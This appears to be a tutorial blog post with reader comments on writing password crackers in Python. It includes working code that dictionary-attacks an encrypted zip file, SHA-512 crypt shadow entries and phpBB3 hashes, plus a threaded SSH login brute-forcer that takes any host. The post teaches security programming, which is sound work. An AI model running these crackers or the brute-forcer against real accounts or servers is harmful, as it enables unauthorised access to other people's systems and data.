Monday, 1 April 2013

Cracking passwords with python

Like I mentioned in "How to think like a hacker", programming is a fundamental skill, and Python is an excellent language to start with. What kind of exercise can we do? Since we're interested in security, why not write scripts that crack passwords? Let's try cracking password-protected zip files, SHA-512 hashes and an SSH server with Python. I will assume you already have basic programming knowledge, at least enough to understand a "hello world!" script. There are already tools for this, hashcat and hydra for example, and I do not believe in reinventing the wheel, but one must at least be able to build a somewhat round wheel before using such tools in order to understand the hacker's mindset.

Cracking password-protected zipfiles


We'll need to zip a file and lock it with a password to experiment with. In Linux, we can use the following command to do so:
Now let's write our script:
Make the script executable with "chmod +x" and run it; it produces this output:
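The post's zip command and script are not reproduced on this page. The following is an added example, my code rather than the original post's script: it builds a small ZipCrypto-protected archive in memory (so no zip binary is needed; the member name, content, password and wordlist are all constructed for the demo) and then tries every word with the standard zipfile module. It also shows the part a cracker has to get right that the post does not spell out: the traditional format stores only a one-byte check value, so a wrong password passes that check one time in 256 and it is the CRC check on the decrypted data that finally rejects it.

```python
import io
import os
import struct
import zipfile
import zlib

# CRC-32 table driving the ZipCrypto key schedule (same polynomial as zlib.crc32).
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


class ZipCrypto:
    """Traditional PKWARE ("ZipCrypto") keystream. Encryption and decryption are
    symmetric; this class exists only so the example can build its own
    password-protected archive without an external `zip` tool."""

    def __init__(self, password: bytes):
        self.keys = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        k = self.keys
        k[0] = (k[0] >> 8) ^ _CRC_TABLE[(k[0] ^ b) & 0xFF]
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = (k[2] >> 8) ^ _CRC_TABLE[(k[2] ^ (k[1] >> 24)) & 0xFF]

    def encrypt(self, plaintext: bytes) -> bytes:
        out = bytearray()
        for p in plaintext:
            t = (self.keys[2] | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)  # the key schedule is driven by the plaintext byte
        return bytes(out)


def make_encrypted_zip(member: str, data: bytes, password: bytes) -> bytes:
    """Build a one-member, stored (uncompressed), ZipCrypto-protected archive in memory."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes, then the high byte of the CRC.
    # That single byte is the only password check the format offers.
    header = os.urandom(11) + bytes([(crc >> 24) & 0xFF])
    body = ZipCrypto(password).encrypt(header + data)
    name = member.encode("ascii")
    dos_time, dos_date = 0, ((2013 - 1980) << 9) | (4 << 5) | 1  # 2013-04-01
    flags, method = 1, zipfile.ZIP_STORED                          # bit 0 = encrypted
    local = struct.pack("<4s2B4HL2L2H", b"PK\x03\x04", 20, 0, flags, method, dos_time,
                        dos_date, crc, len(body), len(data), len(name), 0) + name
    central = struct.pack("<4s4B4HL2L5H2L", b"PK\x01\x02", 20, 0, 20, 0, flags, method,
                          dos_time, dos_date, crc, len(body), len(data), len(name),
                          0, 0, 0, 0, 0, 0) + name
    end = struct.pack("<4s4H2LH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                      len(local) + len(body), 0)
    return local + body + central + end


def crack_zip(archive: bytes, member: str, wordlist):
    """Return the first word in `wordlist` that decrypts `member`, or None."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for word in wordlist:
            try:
                zf.read(member, pwd=word.encode())
            except RuntimeError:
                continue  # "Bad password": the check byte did not match
            except (zipfile.BadZipFile, zlib.error):
                continue  # check byte matched by chance (1/256); CRC or inflate failed
            return word
    return None


if __name__ == "__main__":
    # Constructed archive and wordlist; a real target would be read from disk.
    blob = make_encrypted_zip("secret.txt", b"the flag is inside\n", b"letmein")
    words = ["123456", "password", "letmein", "qwerty"]
    print("password:", crack_zip(blob, "secret.txt", words))
```

Catching both exception types matters: a cracker that only treats RuntimeError as "wrong password" will crash on the 1-in-256 guesses that slip past the check byte.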

Cracking SHA-512 hashes


In Linux, each user's password information is stored in /etc/shadow. The file does not hold the password itself but a salted hash of it, in a field of the form $id$salt$hash, with the salt stored in clear next to the hash. At the time of writing the default algorithm is SHA-512 crypt, identified by the $6$ prefix (newer distributions may default to yescrypt, $y$, but the approach is the same).

SHA stands for Secure Hash Algorithm, a family of cryptographic hash functions designed by the National Security Agency. A hash cannot be reversed, so the only way to recover the password is to hash each candidate with the same salt (and the same number of rounds, 5000 by default for $6$) and compare the result with the stored value. Let's give it a try using Python:

and the output:
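The original script is not reproduced on this page, and the crypt module it would have relied on was removed from the standard library in Python 3.13. The added example below is my code, not the post's: it implements the $6$ algorithm directly with hashlib, parses a shadow line, and runs a wordlist against it, which also makes explicit why the salt must be taken into account. The shadow line is constructed for the demo; its hash is the published "Hello world!" / "saltstring" test vector from the SHA-crypt specification, so the function can be checked against a known answer.

```python
import hashlib

_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _b64_from_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    """crypt(3)-style base64: 24 bits emitted low 6 bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out += _B64[w & 0x3F]
        w >>= 6
    return out


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000,
                 rounds_explicit: bool = False) -> str:
    """Pure-Python SHA-512 crypt ($6$), the scheme behind SHA-512 entries in /etc/shadow."""
    salt = salt[:16]                                  # at most 16 salt bytes are used
    rounds = max(1000, min(rounds, 999_999_999))
    plen = len(password)

    b = hashlib.sha512(password + salt + password).digest()        # digest B
    a = hashlib.sha512(password + salt)                             # digest A
    a.update(b * (plen // 64) + b[: plen % 64])
    i = plen
    while i > 0:                      # one step per bit of the password length
        a.update(b if i & 1 else password)
        i >>= 1
    a = a.digest()

    dp = hashlib.sha512(password * plen).digest()
    p = dp * (plen // 64) + dp[: plen % 64]                        # byte sequence P
    ds = hashlib.sha512(salt * (16 + a[0])).digest()
    s = ds * (len(salt) // 64) + ds[: len(salt) % 64]              # byte sequence S

    c = a
    for r in range(rounds):           # key stretching: this is what makes guessing slow
        h = hashlib.sha512()
        h.update(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()

    out = ""
    for g in range(21):               # output bytes are interleaved in a fixed pattern
        idx = [g, g + 21, g + 42]
        idx = idx[g % 3:] + idx[:g % 3]
        out += _b64_from_24bit(c[idx[0]], c[idx[1]], c[idx[2]], 4)
    out += _b64_from_24bit(0, 0, c[63], 2)

    prefix = "$6$" + (f"rounds={rounds}$" if rounds_explicit else "")
    return prefix + salt.decode("ascii") + "$" + out


def parse_sha512_crypt(field: str):
    """Split a $6$[rounds=N$]salt$hash field into (salt, rounds, rounds_explicit)."""
    parts = field.split("$")
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a SHA-512 crypt hash: " + field)
    rounds, explicit, i = 5000, False, 2
    if parts[2].startswith("rounds="):
        rounds, explicit, i = int(parts[2][len("rounds="):]), True, 3
    return parts[i], rounds, explicit


def crack_shadow_line(line: str, wordlist):
    """Return (user, password) for one /etc/shadow line, password None if not in the list."""
    user, field = line.split(":")[:2]
    salt, rounds, explicit = parse_sha512_crypt(field)
    for word in wordlist:
        if sha512_crypt(word.encode(), salt.encode(), rounds, explicit) == field:
            return user, word
    return user, None


# Constructed shadow line; the hash is the SHA-crypt spec's test vector for "Hello world!".
SHADOW_LINE = ("alice:$6$saltstring$svn8UoSVapNtMuq1ukKS4tPQd8iKwSMHWjl/O817G3uBnIFNjnQJue"
               "sI68u4OTLiBFdcbYEdFCoEOfaS35inz1:15796:0:99999:7:::")

if __name__ == "__main__":
    words = ["123456", "password", "Hello world!"]   # constructed wordlist
    print(crack_shadow_line(SHADOW_LINE, words))
```

Because the salt is part of the input, a precomputed list of SHA-512 hashes is useless here: each candidate has to be hashed again with the victim's salt, which is exactly what the second comment below the post is getting at.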
Other algorithms work the same way; some need a different library to compute them, for example the phpBB3 hash format that is popular in web applications. Here's a way to test those passwords:
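The post's phpBB3 snippet is not reproduced here. As an added example (my code, not the post's), the block below implements the phpBB3 portable hash with nothing but hashlib: it is the phpass $P$ scheme, salted, iterated MD5 with a custom base64, and phpBB3 only changed the prefix to $H$. The hash used for the demo is phpass's published test vector for "test12345", relabelled with the $H$ prefix, which does not change the computation.

```python
import hashlib

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes, count: int) -> str:
    """phpass' own base64 variant: little-endian 24-bit groups over the itoa64 alphabet."""
    out, i = "", 0
    while i < count:
        value = raw[i]
        i += 1
        out += _ITOA64[value & 0x3F]
        if i < count:
            value |= raw[i] << 8
        out += _ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out += _ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += _ITOA64[(value >> 18) & 0x3F]
    return out


def phpass_hash(password: bytes, setting: str) -> str:
    """Compute a phpass portable hash. `setting` is the first 12 characters of a stored
    hash: prefix ($P$ or $H$), one character encoding log2(iterations), 8-char salt."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass/phpBB3 portable hash")
    count = 1 << _ITOA64.index(setting[3])
    salt = setting[4:12].encode("ascii")
    h = hashlib.md5(salt + password).digest()
    for _ in range(count):            # iterated MD5; the count is stored in the hash itself
        h = hashlib.md5(h + password).digest()
    return setting[:12] + _encode64(h, 16)


def crack_phpbb_hash(stored: str, wordlist):
    """Return the first word whose phpass hash equals `stored`, or None."""
    if len(stored) != 34:
        raise ValueError("unexpected hash length")
    setting = stored[:12]
    for word in wordlist:
        if phpass_hash(word.encode(), setting) == stored:
            return word
    return None


# Constructed: phpass' test vector for "test12345", with phpBB3's $H$ prefix.
PHPBB_HASH = "$H$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"

if __name__ == "__main__":
    print(crack_phpbb_hash(PHPBB_HASH, ["password", "admin", "test12345"]))
```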

Bruteforcing SSH servers

Finally, let's see how to brute-force a network service such as SSH using Python. I'll leave it to you to optimize it (hint: threading):

And the output:
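The post's SSH script is not reproduced here. The added example below is my code, not the post's, and takes the threading hint: a worker pool pulls passwords from a queue, a stop event halts every worker at the first hit, and a transient connection error re-queues the guess instead of silently counting it as a failure. The real connector assumes the third-party paramiko library; it is kept separate from the driver so the driver can be exercised offline against a constructed fake server.

```python
import queue
import threading
from typing import Callable, Optional


def ssh_login_paramiko(host: str, port: int, user: str, password: str) -> bool:
    """Real connector; assumes paramiko is installed. True on successful authentication."""
    import paramiko  # imported lazily so the rest of the file runs without it
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=user, password=password,
                       timeout=5, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False          # definite "wrong password"
    finally:
        client.close()        # anything else (socket errors, SSHException) propagates


def brute_force(login: Callable[[str], bool], wordlist, threads: int = 4,
                retries: int = 1) -> Optional[str]:
    """Try every password with `threads` workers; stop all workers at the first success.
    A guess whose attempt raises is retried up to `retries` times."""
    q: "queue.Queue[tuple]" = queue.Queue()
    for w in wordlist:
        q.put((w, 0))
    found, stop, lock = [], threading.Event(), threading.Lock()

    def worker():
        while not stop.is_set():
            try:
                word, attempt = q.get_nowait()
            except queue.Empty:
                return
            try:
                ok = login(word)
            except Exception:                  # network trouble: inconclusive, not a miss
                if attempt < retries:
                    q.put((word, attempt + 1))
                continue
            if ok:
                with lock:
                    found.append(word)
                stop.set()

    pool = [threading.Thread(target=worker) for _ in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
    return found[0] if found else None


class FakeSSHServer:
    """Constructed stand-in for a real server: accepts one password, counts attempts."""

    def __init__(self, secret: str):
        self.secret, self.attempts = secret, 0
        self._lock = threading.Lock()

    def login(self, password: str) -> bool:
        with self._lock:
            self.attempts += 1
        return password == self.secret


class FlakyServer(FakeSSHServer):
    """Constructed: the first attempt at any password fails with a connection error."""

    def __init__(self, secret: str):
        super().__init__(secret)
        self.seen = set()

    def login(self, password: str) -> bool:
        with self._lock:
            first = password not in self.seen
            self.seen.add(password)
        if first:
            raise ConnectionError("constructed transient failure")
        return super().login(password)


if __name__ == "__main__":
    import sys
    host, user, wordfile = sys.argv[1:4]      # usage: script.py HOST USER WORDLIST
    with open(wordfile) as f:
        words = [line.rstrip("\n") for line in f]
    hit = brute_force(lambda pw: ssh_login_paramiko(host, 22, user, pw), words)
    print("password:", hit)
```

Two practical caveats the fake does not model: real SSH daemons throttle and disconnect after a few failed attempts per connection, so the thread count must stay small, and any tooling like fail2ban on the target will ban the source address long before a sizeable wordlist is exhausted.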
I hope this helps you get started crafting your own tools while learning to program. Another lesson here: use strong passwords!

You can ensure the safety of your defense if you only hold positions that cannot be attacked.

5 comments:

  1. I've started reading Violent Python, which this challenge mentioned, to try updating the script to crack SHA-512 hashes. Using a plaintext wordlist, this doesn't work. I tried your code, and some others out there. Should the dictionary actually be a list of SHA-512 hashes?

  2. Needs a plaintext wordlist. I suggest you make your own wordlist using only a few words (including the password) to test. Your suggestion would be worth it if we didn't take the salt into account. Also, your text file (wordlist) format might be different according to your operating system. This example would probably not work in an MS Windows environment.

  3. The sha512 example worked great for me...also reading Violent Python. Thanks!
